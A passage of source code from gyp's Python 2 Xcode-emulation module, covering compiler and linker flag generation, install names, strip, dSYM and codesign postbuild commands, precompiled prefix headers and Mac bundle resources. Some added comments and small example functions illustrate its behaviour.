# Non-bundled loadable_modules are called foo.so for some reason
# (that is, .so and no prefix) with the xcode build -- match that.
'loadable_module': '',
}[self.spec['type']])
def _GetStandaloneBinaryPath(self):
"""Returns the name of the non-bundle binary represented by this target.
E.g. hello_world. Only valid for non-bundles."""
assert not self._IsBundle()
assert self.spec['type'] in (
'executable', 'shared_library', 'static_library', 'loadable_module'), (
'Unexpected type %s' % self.spec['type'])
target = self.spec['target_name']
if self.spec['type'] == 'static_library':
if target[:3] == 'lib':
target = target[3:]
elif self.spec['type'] in ('loadable_module', 'shared_library'):
if target[:3] == 'lib':
target = target[3:]
target_prefix = self._GetStandaloneExecutablePrefix()
target = self.spec.get('product_name', target)
target_ext = self._GetStandaloneExecutableSuffix()
return target_prefix + target + target_ext
def GetExecutableName(self):
"""Returns the executable name of the bundle represented by this target.
E.g. Chromium."""
if self._IsBundle():
return self.spec.get('product_name', self.spec['target_name'])
else:
return self._GetStandaloneBinaryPath()
def GetExecutablePath(self):
"""Returns the directory name of the bundle represented by this target. E.g.
Chromium.app/Contents/MacOS/Chromium."""
if self._IsBundle():
return self._GetBundleBinaryPath()
else:
return self._GetStandaloneBinaryPath()
def GetActiveArchs(self, configname):
"""Returns the architectures this target should be built for."""
# TODO: Look at VALID_ARCHS, ONLY_ACTIVE_ARCH; possibly set
# CURRENT_ARCH / NATIVE_ARCH env vars?
return self.xcode_settings[configname].get('ARCHS', ['i386'])
def _GetStdout(self, cmdlist):
job = subprocess.Popen(cmdlist, stdout=subprocess.PIPE)
out = job.communicate()[0]
if job.returncode != 0:
sys.stderr.write(out + '\n')
raise GypError('Error %d running %s' % (job.returncode, cmdlist[0]))
return out.rstrip('\n')
def _GetSdkVersionInfoItem(self, sdk, infoitem):
return self._GetStdout(['xcodebuild', '-version', '-sdk', sdk, infoitem])
def _SdkRoot(self, configname):
if configname is None:
configname = self.configname
return self.GetPerConfigSetting('SDKROOT', configname, default='')
def _SdkPath(self, configname=None):
sdk_root = self._SdkRoot(configname)
if sdk_root.startswith('/'):
return sdk_root
if sdk_root not in XcodeSettings._sdk_path_cache:
XcodeSettings._sdk_path_cache[sdk_root] = self._GetSdkVersionInfoItem(
sdk_root, 'Path')
return XcodeSettings._sdk_path_cache[sdk_root]
def _AppendPlatformVersionMinFlags(self, lst):
self._Appendf(lst, 'MACOSX_DEPLOYMENT_TARGET', '-mmacosx-version-min=%s')
if 'IPHONEOS_DEPLOYMENT_TARGET' in self._Settings():
# TODO: Implement this better?
sdk_path_basename = os.path.basename(self._SdkPath())
if sdk_path_basename.lower().startswith('iphonesimulator'):
self._Appendf(lst, 'IPHONEOS_DEPLOYMENT_TARGET',
'-mios-simulator-version-min=%s')
else:
self._Appendf(lst, 'IPHONEOS_DEPLOYMENT_TARGET',
'-miphoneos-version-min=%s')
def GetCflags(self, configname, arch=None):
"""Returns flags that need to be added to .c, .cc, .m, and .mm
compilations."""
    # These functions (and the similar ones below) do not offer complete
# emulation of all xcode_settings keys. They're implemented on demand.
self.configname = configname
cflags = []
sdk_root = self._SdkPath()
if 'SDKROOT' in self._Settings():
cflags.append('-isysroot %s' % sdk_root)
if self._Test('CLANG_WARN_CONSTANT_CONVERSION', 'YES', default='NO'):
cflags.append('-Wconstant-conversion')
if self._Test('GCC_CHAR_IS_UNSIGNED_CHAR', 'YES', default='NO'):
cflags.append('-funsigned-char')
if self._Test('GCC_CW_ASM_SYNTAX', 'YES', default='YES'):
cflags.append('-fasm-blocks')
if 'GCC_DYNAMIC_NO_PIC' in self._Settings():
if self._Settings()['GCC_DYNAMIC_NO_PIC'] == 'YES':
cflags.append('-mdynamic-no-pic')
else:
pass
# TODO: In this case, it depends on the target. xcode passes
# mdynamic-no-pic by default for executable and possibly static lib
# according to mento
if self._Test('GCC_ENABLE_PASCAL_STRINGS', 'YES', default='YES'):
cflags.append('-mpascal-strings')
self._Appendf(cflags, 'GCC_OPTIMIZATION_LEVEL', '-O%s', default='s')
if self._Test('GCC_GENERATE_DEBUGGING_SYMBOLS', 'YES', default='YES'):
dbg_format = self._Settings().get('DEBUG_INFORMATION_FORMAT', 'dwarf')
if dbg_format == 'dwarf':
cflags.append('-gdwarf-2')
elif dbg_format == 'stabs':
raise NotImplementedError('stabs debug format is not supported yet.')
elif dbg_format == 'dwarf-with-dsym':
cflags.append('-gdwarf-2')
else:
raise NotImplementedError('Unknown debug format %s' % dbg_format)
if self._Settings().get('GCC_STRICT_ALIASING') == 'YES':
cflags.append('-fstrict-aliasing')
elif self._Settings().get('GCC_STRICT_ALIASING') == 'NO':
cflags.append('-fno-strict-aliasing')
if self._Test('GCC_SYMBOLS_PRIVATE_EXTERN', 'YES', default='NO'):
cflags.append('-fvisibility=hidden')
if self._Test('GCC_TREAT_WARNINGS_AS_ERRORS', 'YES', default='NO'):
cflags.append('-Werror')
if self._Test('GCC_WARN_ABOUT_MISSING_NEWLINE', 'YES', default='NO'):
cflags.append('-Wnewline-eof')
self._AppendPlatformVersionMinFlags(cflags)
# TODO:
if self._Test('COPY_PHASE_STRIP', 'YES', default='NO'):
self._WarnUnimplemented('COPY_PHASE_STRIP')
self._WarnUnimplemented('GCC_DEBUGGING_SYMBOLS')
self._WarnUnimplemented('GCC_ENABLE_OBJC_EXCEPTIONS')
# TODO: This is exported correctly, but assigning to it is not supported.
self._WarnUnimplemented('MACH_O_TYPE')
self._WarnUnimplemented('PRODUCT_TYPE')
if arch is not None:
archs = [arch]
else:
archs = self._Settings().get('ARCHS', ['i386'])
if len(archs) != 1:
# TODO: Supporting fat binaries will be annoying.
self._WarnUnimplemented('ARCHS')
archs = ['i386']
cflags.append('-arch ' + archs[0])
if archs[0] in ('i386', 'x86_64'):
if self._Test('GCC_ENABLE_SSE3_EXTENSIONS', 'YES', default='NO'):
cflags.append('-msse3')
if self._Test('GCC_ENABLE_SUPPLEMENTAL_SSE3_INSTRUCTIONS', 'YES',
default='NO'):
cflags.append('-mssse3') # Note 3rd 's'.
if self._Test('GCC_ENABLE_SSE41_EXTENSIONS', 'YES', default='NO'):
cflags.append('-msse4.1')
if self._Test('GCC_ENABLE_SSE42_EXTENSIONS', 'YES', default='NO'):
cflags.append('-msse4.2')
cflags += self._Settings().get('WARNING_CFLAGS', [])
config = self.spec['configurations'][self.configname]
framework_dirs = config.get('mac_framework_dirs', [])
for directory in framework_dirs:
cflags.append('-F' + directory.replace('$(SDKROOT)', sdk_root))
self.configname = None
return cflags
def GetCflagsC(self, configname):
"""Returns flags that need to be added to .c, and .m compilations."""
self.configname = configname
cflags_c = []
if self._Settings().get('GCC_C_LANGUAGE_STANDARD', '') == 'ansi':
cflags_c.append('-ansi')
else:
self._Appendf(cflags_c, 'GCC_C_LANGUAGE_STANDARD', '-std=%s')
cflags_c += self._Settings().get('OTHER_CFLAGS', [])
self.configname = None
return cflags_c
def GetCflagsCC(self, configname):
"""Returns flags that need to be added to .cc, and .mm compilations."""
self.configname = configname
cflags_cc = []
clang_cxx_language_standard = self._Settings().get(
'CLANG_CXX_LANGUAGE_STANDARD')
    # Note: Don't map c++0x to c++11 so that c++0x can be used with older
# clangs that don't understand c++11 yet (like Xcode 4.2's).
if clang_cxx_language_standard:
cflags_cc.append('-std=%s' % clang_cxx_language_standard)
self._Appendf(cflags_cc, 'CLANG_CXX_LIBRARY', '-stdlib=%s')
if self._Test('GCC_ENABLE_CPP_RTTI', 'NO', default='YES'):
cflags_cc.append('-fno-rtti')
if self._Test('GCC_ENABLE_CPP_EXCEPTIONS', 'NO', default='YES'):
cflags_cc.append('-fno-exceptions')
if self._Test('GCC_INLINES_ARE_PRIVATE_EXTERN', 'YES', default='NO'):
cflags_cc.append('-fvisibility-inlines-hidden')
if self._Test('GCC_THREADSAFE_STATICS', 'NO', default='YES'):
cflags_cc.append('-fno-threadsafe-statics')
# Note: This flag is a no-op for clang, it only has an effect for gcc.
if self._Test('GCC_WARN_ABOUT_INVALID_OFFSETOF_MACRO', 'NO', default='YES'):
cflags_cc.append('-Wno-invalid-offsetof')
other_ccflags = []
for flag in self._Settings().get('OTHER_CPLUSPLUSFLAGS', ['$(inherited)']):
# TODO: More general variable expansion. Missing in many other places too.
if flag in ('$inherited', '$(inherited)', '${inherited}'):
flag = '$OTHER_CFLAGS'
if flag in ('$OTHER_CFLAGS', '$(OTHER_CFLAGS)', '${OTHER_CFLAGS}'):
other_ccflags += self._Settings().get('OTHER_CFLAGS', [])
else:
other_ccflags.append(flag)
cflags_cc += other_ccflags
self.configname = None
return cflags_cc
def _AddObjectiveCGarbageCollectionFlags(self, flags):
gc_policy = self._Settings().get('GCC_ENABLE_OBJC_GC', 'unsupported')
if gc_policy == 'supported':
flags.append('-fobjc-gc')
elif gc_policy == 'required':
flags.append('-fobjc-gc-only')
def _AddObjectiveCARCFlags(self, flags):
if self._Test('CLANG_ENABLE_OBJC_ARC', 'YES', default='NO'):
flags.append('-fobjc-arc')
def _AddObjectiveCMissingPropertySynthesisFlags(self, flags):
if self._Test('CLANG_WARN_OBJC_MISSING_PROPERTY_SYNTHESIS',
'YES', default='NO'):
flags.append('-Wobjc-missing-property-synthesis')
def GetCflagsObjC(self, configname):
"""Returns flags that need to be added to .m compilations."""
self.configname = configname
cflags_objc = []
self._AddObjectiveCGarbageCollectionFlags(cflags_objc)
self._AddObjectiveCARCFlags(cflags_objc)
self._AddObjectiveCMissingPropertySynthesisFlags(cflags_objc)
self.configname = None
return cflags_objc
def GetCflagsObjCC(self, configname):
"""Returns flags that need to be added to .mm compilations."""
self.configname = configname
cflags_objcc = []
self._AddObjectiveCGarbageCollectionFlags(cflags_objcc)
self._AddObjectiveCARCFlags(cflags_objcc)
self._AddObjectiveCMissingPropertySynthesisFlags(cflags_objcc)
if self._Test('GCC_OBJC_CALL_CXX_CDTORS', 'YES', default='NO'):
cflags_objcc.append('-fobjc-call-cxx-cdtors')
self.configname = None
return cflags_objcc
def GetInstallNameBase(self):
"""Return DYLIB_INSTALL_NAME_BASE for this target."""
# Xcode sets this for shared_libraries, and for nonbundled loadable_modules.
if (self.spec['type'] != 'shared_library' and
(self.spec['type'] != 'loadable_module' or self._IsBundle())):
return None
install_base = self.GetPerTargetSetting(
'DYLIB_INSTALL_NAME_BASE',
default='/Library/Frameworks' if self._IsBundle() else '/usr/local/lib')
return install_base
def _StandardizePath(self, path):
"""Do :standardizepath processing for path."""
# I'm not quite sure what :standardizepath does. Just call normpath(),
# but don't let @executable_path/../foo collapse to foo.
if '/' in path:
prefix, rest = '', path
if path.startswith('@'):
prefix, rest = path.split('/', 1)
rest = os.path.normpath(rest) # :standardizepath
path = os.path.join(prefix, rest)
return path
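  # Worked examples (editor's addition): '@executable_path/../foo' survives
  # _StandardizePath unchanged because the '@' prefix is split off before
  # normpath() runs, while a plain 'a/b/../c' normalizes to 'a/c'.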
def GetInstallName(self):
"""Return LD_DYLIB_INSTALL_NAME for this target."""
# Xcode sets this for shared_libraries, and for nonbundled loadable_modules.
if (self.spec['type'] != 'shared_library' and
(self.spec['type'] != 'loadable_module' or self._IsBundle())):
return None
default_install_name = \
'$(DYLIB_INSTALL_NAME_BASE:standardizepath)/$(EXECUTABLE_PATH)'
install_name = self.GetPerTargetSetting(
'LD_DYLIB_INSTALL_NAME', default=default_install_name)
# Hardcode support for the variables used in chromium for now, to
# unblock people using the make build.
if '$' in install_name:
assert install_name in ('$(DYLIB_INSTALL_NAME_BASE:standardizepath)/'
'$(WRAPPER_NAME)/$(PRODUCT_NAME)', default_install_name), (
'Variables in LD_DYLIB_INSTALL_NAME are not generally supported '
'yet in target \'%s\' (got \'%s\')' %
(self.spec['target_name'], install_name))
install_name = install_name.replace(
'$(DYLIB_INSTALL_NAME_BASE:standardizepath)',
self._StandardizePath(self.GetInstallNameBase()))
if self._IsBundle():
# These are only valid for bundles, hence the |if|.
install_name = install_name.replace(
'$(WRAPPER_NAME)', self.GetWrapperName())
install_name = install_name.replace(
'$(PRODUCT_NAME)', self.GetProductName())
else:
assert '$(WRAPPER_NAME)' not in install_name
assert '$(PRODUCT_NAME)' not in install_name
install_name = install_name.replace(
'$(EXECUTABLE_PATH)', self.GetExecutablePath())
return install_name
def _MapLinkerFlagFilename(self, ldflag, gyp_to_build_path):
"""Checks if ldflag contains a filename and if so remaps it from
gyp-directory-relative to build-directory-relative."""
# This list is expanded on demand.
# They get matched as:
# -exported_symbols_list file
# -Wl,exported_symbols_list file
# -Wl,exported_symbols_list,file
    LINKER_FILE = r'(\S+)'
    WORD = r'\S+'
linker_flags = [
['-exported_symbols_list', LINKER_FILE], # Needed for NaCl.
['-unexported_symbols_list', LINKER_FILE],
['-reexported_symbols_list', LINKER_FILE],
['-sectcreate', WORD, WORD, LINKER_FILE], # Needed for remoting.
]
for flag_pattern in linker_flags:
regex = re.compile('(?:-Wl,)?' + '[ ,]'.join(flag_pattern))
m = regex.match(ldflag)
if m:
ldflag = ldflag[:m.start(1)] + gyp_to_build_path(m.group(1)) + \
ldflag[m.end(1):]
# Required for ffmpeg (no idea why they don't use LIBRARY_SEARCH_PATHS,
# TODO(thakis): Update ffmpeg.gyp):
if ldflag.startswith('-L'):
ldflag = '-L' + gyp_to_build_path(ldflag[len('-L'):])
return ldflag
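  # Worked example (editor's addition): if gyp_to_build_path maps
  # 'exports.def' to '../../exports.def', then
  # '-Wl,-exported_symbols_list,exports.def' is rewritten to
  # '-Wl,-exported_symbols_list,../../exports.def'; flags matching no
  # pattern above pass through (modulo the -L prefix remap) unchanged.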
def GetLdflags(self, configname, product_dir, gyp_to_build_path, arch=None):
"""Returns flags that need to be passed to the linker.
Args:
configname: The name of the configuration to get ld flags for.
      product_dir: The directory where products such as static and dynamic
libraries are placed. This is added to the library search path.
gyp_to_build_path: A function that converts paths relative to the
          current gyp file to paths relative to the build directory.
"""
self.configname = configname
ldflags = []
# The xcode build is relative to a gyp file's directory, and OTHER_LDFLAGS
# can contain entries that depend on this. Explicitly absolutify these.
for ldflag in self._Settings().get('OTHER_LDFLAGS', []):
ldflags.append(self._MapLinkerFlagFilename(ldflag, gyp_to_build_path))
if self._Test('DEAD_CODE_STRIPPING', 'YES', default='NO'):
ldflags.append('-Wl,-dead_strip')
if self._Test('PREBINDING', 'YES', default='NO'):
ldflags.append('-Wl,-prebind')
self._Appendf(
ldflags, 'DYLIB_COMPATIBILITY_VERSION', '-compatibility_version %s')
self._Appendf(
ldflags, 'DYLIB_CURRENT_VERSION', '-current_version %s')
self._AppendPlatformVersionMinFlags(ldflags)
if 'SDKROOT' in self._Settings():
ldflags.append('-isysroot ' + self._SdkPath())
for library_path in self._Settings().get('LIBRARY_SEARCH_PATHS', []):
ldflags.append('-L' + gyp_to_build_path(library_path))
if 'ORDER_FILE' in self._Settings():
ldflags.append('-Wl,-order_file ' +
'-Wl,' + gyp_to_build_path(
self._Settings()['ORDER_FILE']))
if arch is not None:
archs = [arch]
else:
archs = self._Settings().get('ARCHS', ['i386'])
if len(archs) != 1:
# TODO: Supporting fat binaries will be annoying.
self._WarnUnimplemented('ARCHS')
archs = ['i386']
ldflags.append('-arch ' + archs[0])
# Xcode adds the product directory by default.
ldflags.append('-L' + product_dir)
install_name = self.GetInstallName()
if install_name and self.spec['type'] != 'loadable_module':
ldflags.append('-install_name ' + install_name.replace(' ', r'\ '))
for rpath in self._Settings().get('LD_RUNPATH_SEARCH_PATHS', []):
ldflags.append('-Wl,-rpath,' + rpath)
config = self.spec['configurations'][self.configname]
framework_dirs = config.get('mac_framework_dirs', [])
for directory in framework_dirs:
ldflags.append('-F' + directory.replace('$(SDKROOT)', self._SdkPath()))
self.configname = None
return ldflags
def GetLibtoolflags(self, configname):
"""Returns flags that need to be passed to the static linker.
Args:
configname: The name of the configuration to get ld flags for.
"""
self.configname = configname
libtoolflags = []
for libtoolflag in self._Settings().get('OTHER_LDFLAGS', []):
libtoolflags.append(libtoolflag)
# TODO(thakis): ARCHS?
self.configname = None
return libtoolflags
def GetPerTargetSettings(self):
"""Gets a list of all the per-target settings. This will only fetch keys
whose values are the same across all configurations."""
first_pass = True
result = {}
for configname in sorted(self.xcode_settings.keys()):
if first_pass:
result = dict(self.xcode_settings[configname])
first_pass = False
else:
for key, value in self.xcode_settings[configname].iteritems():
if key not in result:
continue
elif result[key] != value:
del result[key]
return result
def GetPerConfigSetting(self, setting, configname, default=None):
if configname in self.xcode_settings:
return self.xcode_settings[configname].get(setting, default)
else:
return self.GetPerTargetSetting(setting, default)
def GetPerTargetSetting(self, setting, default=None):
"""Tries to get xcode_settings.setting from spec. Assumes that the setting
has the same value in all configurations and throws otherwise."""
is_first_pass = True
result = None
for configname in sorted(self.xcode_settings.keys()):
if is_first_pass:
result = self.xcode_settings[configname].get(setting, None)
is_first_pass = False
else:
assert result == self.xcode_settings[configname].get(setting, None), (
"Expected per-target setting for '%s', got per-config setting "
"(target %s)" % (setting, self.spec['target_name']))
if result is None:
return default
return result
def _GetStripPostbuilds(self, configname, output_binary, quiet):
"""Returns a list of shell commands that contain the shell commands
    necessary to strip this target's binary. These should be run as postbuilds
before the actual postbuilds run."""
self.configname = configname
result = []
if (self._Test('DEPLOYMENT_POSTPROCESSING', 'YES', default='NO') and
self._Test('STRIP_INSTALLED_PRODUCT', 'YES', default='NO')):
default_strip_style = 'debugging'
if self.spec['type'] == 'loadable_module' and self._IsBundle():
default_strip_style = 'non-global'
elif self.spec['type'] == 'executable':
default_strip_style = 'all'
strip_style = self._Settings().get('STRIP_STYLE', default_strip_style)
strip_flags = {
'all': '',
'non-global': '-x',
'debugging': '-S',
}[strip_style]
explicit_strip_flags = self._Settings().get('STRIPFLAGS', '')
if explicit_strip_flags:
strip_flags += ' ' + _NormalizeEnvVarReferences(explicit_strip_flags)
if not quiet:
result.append('echo STRIP\\(%s\\)' % self.spec['target_name'])
result.append('strip %s %s' % (strip_flags, output_binary))
self.configname = None
return result
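# Illustrative note (editor's addition, not part of gyp): for a plain
# executable target named "app" with DEPLOYMENT_POSTPROCESSING and
# STRIP_INSTALLED_PRODUCT both YES and no STRIP_STYLE override, the
# commands above come out roughly as
#   ['echo STRIP\\(app\\)', 'strip  out/app']
# since strip_style defaults to 'all', whose flag string is empty.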
def _GetDebugInfoPostbuilds(self, configname, output, output_binary, quiet):
"""Returns a list of shell commands that contain the shell commands
neccessary to massage this target's debug information. These should be run
as postbuilds before the actual postbuilds run."""
self.configname = configname
# For static libraries, no dSYMs are created.
result = []
if (self._Test('GCC_GENERATE_DEBUGGING_SYMBOLS', 'YES', default='YES') and
self._Test(
'DEBUG_INFORMATION_FORMAT', 'dwarf-with-dsym', default='dwarf') and
self.spec['type'] != 'static_library'):
if not quiet:
result.append('echo DSYMUTIL\\(%s\\)' % self.spec['target_name'])
result.append('dsymutil %s -o %s' % (output_binary, output + '.dSYM'))
self.configname = None
return result
def _GetTargetPostbuilds(self, configname, output, output_binary,
quiet=False):
"""Returns a list of shell commands that contain the shell commands
to run as postbuilds for this target, before the actual postbuilds."""
# dSYMs need to build before stripping happens.
return (
self._GetDebugInfoPostbuilds(configname, output, output_binary, quiet) +
self._GetStripPostbuilds(configname, output_binary, quiet))
def _GetIOSPostbuilds(self, configname, output_binary):
"""Return a shell command to codesign the iOS output binary so it can
be deployed to a device. This should be run as the very last step of the
build."""
if not (self.isIOS and self.spec['type'] == "executable"):
return []
identity = self.xcode_settings[configname].get('CODE_SIGN_IDENTITY', '')
if identity == '':
return []
if identity not in XcodeSettings._codesigning_key_cache:
proc = subprocess.Popen(['security', 'find-identity', '-p', 'codesigning',
'-v'], stdout=subprocess.PIPE)
output = proc.communicate()[0].strip()
key = None
for item in output.split("\n"):
if identity in item:
assert key is None, (
"Multiple codesigning identities for identity: %s" %
identity)
key = item.split(' ')[1]
XcodeSettings._codesigning_key_cache[identity] = key
key = XcodeSettings._codesigning_key_cache[identity]
if key:
# Warn for any unimplemented signing xcode keys.
unimpl = ['CODE_SIGN_RESOURCE_RULES_PATH', 'OTHER_CODE_SIGN_FLAGS',
'CODE_SIGN_ENTITLEMENTS']
keys = set(self.xcode_settings[configname].keys())
unimpl = set(unimpl) & keys
if unimpl:
print 'Warning: Some codesign keys not implemented, ignoring:', \
' '.join(unimpl)
return ['codesign --force --sign %s %s' % (key, output_binary)]
return []
def AddImplicitPostbuilds(self, configname, output, output_binary,
postbuilds=[], quiet=False):
"""Returns a list of shell commands that should run before and after
|postbuilds|."""
assert output_binary is not None
pre = self._GetTargetPostbuilds(configname, output, output_binary, quiet)
post = self._GetIOSPostbuilds(configname, output_binary)
return pre + postbuilds + post
def _AdjustLibrary(self, library, config_name=None):
if library.endswith('.framework'):
l = '-framework ' + os.path.splitext(os.path.basename(library))[0]
else:
m = self.library_re.match(library)
if m:
l = '-l' + m.group(1)
else:
l = library
return l.replace('$(SDKROOT)', self._SdkPath(config_name))
def AdjustLibraries(self, libraries, config_name=None):
"""Transforms entries like 'Cocoa.framework' in libraries into entries like
'-framework Cocoa', 'libcrypto.dylib' into '-lcrypto', etc.
"""
libraries = [self._AdjustLibrary(library, config_name)
for library in libraries]
return libraries
def _BuildMachineOSBuild(self):
return self._GetStdout(['sw_vers', '-buildVersion'])
def _XcodeVersion(self):
# `xcodebuild -version` output looks like
# Xcode 4.6.3
# Build version 4H1503
# or like
# Xcode 3.2.6
# Component versions: DevToolsCore-1809.0; DevToolsSupport-1806.0
# BuildVersion: 10M2518
# Convert that to '0463', '4H1503'.
version_list = self._GetStdout(['xcodebuild', '-version']).splitlines()
version = version_list[0]
build = version_list[-1]
# Be careful to convert "4.2" to "0420":
version = version.split()[-1].replace('.', '')
version = (version + '0' * (3 - len(version))).zfill(4)
build = build.split()[-1]
return version, build
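# Illustrative note (editor's addition): _XcodeVersion() turns
#   'Xcode 4.6.3' / 'Build version 4H1503' into ('0463', '4H1503'),
# and 'Xcode 4.2' into version '0420' -- the dots are dropped, the string
# is right-padded with '0' to three digits, then zero-filled to four.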
def _XcodeIOSDeviceFamily(self, configname):
family = self.xcode_settings[configname].get('TARGETED_DEVICE_FAMILY', '1')
return [int(x) for x in family.split(',')]
def GetExtraPlistItems(self, configname=None):
"""Returns a dictionary with extra items to insert into Info.plist."""
if configname not in XcodeSettings._plist_cache:
cache = {}
cache['BuildMachineOSBuild'] = self._BuildMachineOSBuild()
xcode, xcode_build = self._XcodeVersion()
cache['DTXcode'] = xcode
cache['DTXcodeBuild'] = xcode_build
sdk_root = self._SdkRoot(configname)
cache['DTSDKName'] = sdk_root
if xcode >= '0430':
cache['DTSDKBuild'] = self._GetSdkVersionInfoItem(
sdk_root, 'ProductBuildVersion')
else:
cache['DTSDKBuild'] = cache['BuildMachineOSBuild']
if self.isIOS:
cache['DTPlatformName'] = cache['DTSDKName']
if configname.endswith("iphoneos"):
cache['DTPlatformVersion'] = self._GetSdkVersionInfoItem(
sdk_root, 'ProductVersion')
cache['CFBundleSupportedPlatforms'] = ['iPhoneOS']
else:
cache['CFBundleSupportedPlatforms'] = ['iPhoneSimulator']
XcodeSettings._plist_cache[configname] = cache
# Include extra plist items that are per-target, not per global
# XcodeSettings.
items = dict(XcodeSettings._plist_cache[configname])
if self.isIOS:
items['UIDeviceFamily'] = self._XcodeIOSDeviceFamily(configname)
return items
class MacPrefixHeader(object):
"""A class that helps with emulating Xcode's GCC_PREFIX_HEADER feature.
This feature consists of several pieces:
* If GCC_PREFIX_HEADER is present, all compilations in that project get an
additional |-include path_to_prefix_header| cflag.
* If GCC_PRECOMPILE_PREFIX_HEADER is present too, then the prefix header is
instead compiled, and all other compilations in the project get an
additional |-include path_to_compiled_header| instead.
+ Compiled prefix headers have the extension gch. There is one gch file for
every language used in the project (c, cc, m, mm), since gch files for
different languages aren't compatible.
+ gch files themselves are built with the target's normal cflags, but they
obviously don't get the |-include| flag. Instead, they need a -x flag that
describes their language.
+ All o files in the target need to depend on the gch file, to make sure
it's built before any o file is built.
This class helps with some of these tasks, but it needs help from the build
system for writing dependencies to the gch files, for writing build commands
for the gch files, and for figuring out the location of the gch files.
"""
def __init__(self, xcode_settings,
gyp_path_to_build_path, gyp_path_to_build_output):
"""If xcode_settings is None, all methods on this class are no-ops.
Args:
gyp_path_to_build_path: A function that takes a gyp-relative path,
and returns a path relative to the build directory.
gyp_path_to_build_output: A function that takes a gyp-relative path and
a language code ('c', 'cc', 'm', or 'mm'), and that returns a path
to where the output of precompiling that path for that language
should be placed (without the trailing '.gch').
"""
# This doesn't support per-configuration prefix headers. Good enough
# for now.
self.header = None
self.compile_headers = False
if xcode_settings:
self.header = xcode_settings.GetPerTargetSetting('GCC_PREFIX_HEADER')
self.compile_headers = xcode_settings.GetPerTargetSetting(
'GCC_PRECOMPILE_PREFIX_HEADER', default='NO') != 'NO'
self.compiled_headers = {}
if self.header:
if self.compile_headers:
for lang in ['c', 'cc', 'm', 'mm']:
self.compiled_headers[lang] = gyp_path_to_build_output(
self.header, lang)
self.header = gyp_path_to_build_path(self.header)
def _CompiledHeader(self, lang, arch):
assert self.compile_headers
h = self.compiled_headers[lang]
if arch:
h += '.' + arch
return h
def GetInclude(self, lang, arch=None):
"""Gets the cflags to include the prefix header for language |lang|."""
if self.compile_headers and lang in self.compiled_headers:
return '-include %s' % self._CompiledHeader(lang, arch)
elif self.header:
return '-include %s' % self.header
else:
return ''
def _Gch(self, lang, arch):
"""Returns the actual file name of the prefix header for language |lang|."""
assert self.compile_headers
return self._CompiledHeader(lang, arch) + '.gch'
def GetObjDependencies(self, sources, objs, arch=None):
"""Given a list of source files and the corresponding object files, returns
a list of (source, object, gch) tuples, where |gch| is the build-directory
relative path to the gch file each object file depends on. |sources[i]|
has to be the source file belonging to |objs[i]|."""
if not self.header or not self.compile_headers:
return []
result = []
for source, obj in zip(sources, objs):
ext = os.path.splitext(source)[1]
lang = {
'.c': 'c',
'.cpp': 'cc', '.cc': 'cc', '.cxx': 'cc',
'.m': 'm',
'.mm': 'mm',
}.get(ext, None)
if lang:
result.append((source, obj, self._Gch(lang, arch)))
return result
def GetPchBuildCommands(self, arch=None):
"""Returns [(path_to_gch, language_flag, language, header)].
|path_to_gch| and |header| are relative to the build directory.
"""
if not self.header or not self.compile_headers:
return []
return [
(self._Gch('c', arch), '-x c-header', 'c', self.header),
(self._Gch('cc', arch), '-x c++-header', 'cc', self.header),
(self._Gch('m', arch), '-x objective-c-header', 'm', self.header),
(self._Gch('mm', arch), '-x objective-c++-header', 'mm', self.header),
]
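# Editor's sketch (not part of gyp): a minimal stand-in for XcodeSettings,
# just enough to drive MacPrefixHeader. The stub class and the lambda paths
# are invented for illustration.
def _ExampleMacPrefixHeader():
  class _StubSettings(object):
    def GetPerTargetSetting(self, setting, default=None):
      return {'GCC_PREFIX_HEADER': 'src/prefix.h',
              'GCC_PRECOMPILE_PREFIX_HEADER': 'YES'}.get(setting, default)
  pch = MacPrefixHeader(
      _StubSettings(),
      gyp_path_to_build_path=lambda p: 'out/' + p,
      gyp_path_to_build_output=lambda p, lang: 'out/pch/%s.%s' % (p, lang))
  # The compiled-header paths are computed from the gyp-relative header
  # before it is rewritten to a build-relative path.
  assert pch.GetInclude('c') == '-include out/pch/src/prefix.h.c'
  assert pch.GetPchBuildCommands()[0] == (
      'out/pch/src/prefix.h.c.gch', '-x c-header', 'c', 'out/src/prefix.h')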
def MergeGlobalXcodeSettingsToSpec(global_dict, spec):
"""Merges the global xcode_settings dictionary into each configuration of the
target represented by spec. For keys that are both in the global and the local
xcode_settings dict, the local key gets precedence.
"""
# The xcode generator special-cases global xcode_settings and does something
# that amounts to merging in the global xcode_settings into each local
# xcode_settings dict.
global_xcode_settings = global_dict.get('xcode_settings', {})
for config in spec['configurations'].values():
if 'xcode_settings' in config:
new_settings = global_xcode_settings.copy()
new_settings.update(config['xcode_settings'])
config['xcode_settings'] = new_settings
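# Editor's sketch (not part of gyp): local keys win over global ones when
# merging; the dicts below are made up for illustration.
def _ExampleMergeGlobalXcodeSettingsToSpec():
  global_dict = {'xcode_settings': {'SDKROOT': 'macosx', 'ARCHS': ['i386']}}
  spec = {'configurations':
          {'Debug': {'xcode_settings': {'ARCHS': ['x86_64']}}}}
  MergeGlobalXcodeSettingsToSpec(global_dict, spec)
  assert spec['configurations']['Debug']['xcode_settings'] == {
      'SDKROOT': 'macosx', 'ARCHS': ['x86_64']}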
def IsMacBundle(flavor, spec):
"""Returns if |spec| should be treated as a bundle.
Bundles are directories with a certain subdirectory structure, instead of
just a single file. Bundle rules do not produce a binary but also package
resources into that directory."""
is_mac_bundle = (int(spec.get('mac_bundle', 0)) != 0 and flavor == 'mac')
if is_mac_bundle:
assert spec['type'] != 'none', (
'mac_bundle targets cannot have type none (target "%s")' %
spec['target_name'])
return is_mac_bundle
def GetMacBundleResources(product_dir, xcode_settings, resources):
"""Yields (output, resource) pairs for every resource in |resources|.
Only call this for mac bundle targets.
Args:
product_dir: Path to the directory containing the output bundle,
relative to the build directory.
xcode_settings: The XcodeSettings of the current target.
resources: A list of bundle resources, relative to the build directory.
"""
dest = os.path.join(product_dir,
xcode_settings.GetBundleResourceFolder())
for res in resources:
output = dest
# The make generator doesn't support it, so forbid it everywhere
# to keep the generators more interchangeable.
assert ' ' not in res, (
"Spaces in resource filenames not supported (%s)" % res)
# Split into (path,file).
res_parts = os.path.split(res)
# Now split the path into (prefix,maybe.lproj).
lproj_parts = os.path.split(res_parts[0])
# If the resource lives in a .lproj bundle, add that to the destination.
if lproj_parts[1].endswith('.lproj'):
output = os.path.join(output, lproj_parts[1])
output = os.path.join(output, res_parts[1])
# Compiled XIB files are referred to by .nib.
if output.endswith('.xib'):
output = os.path.splitext(output)[0] + '.nib'
# Compiled storyboard files are referred to by .storyboardc.
if output.endswith('.storyboard'):
output = os.path.splitext(output)[0] + '.storyboardc'
yield output, res
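# Editor's sketch (not part of gyp): .lproj directories are preserved in the
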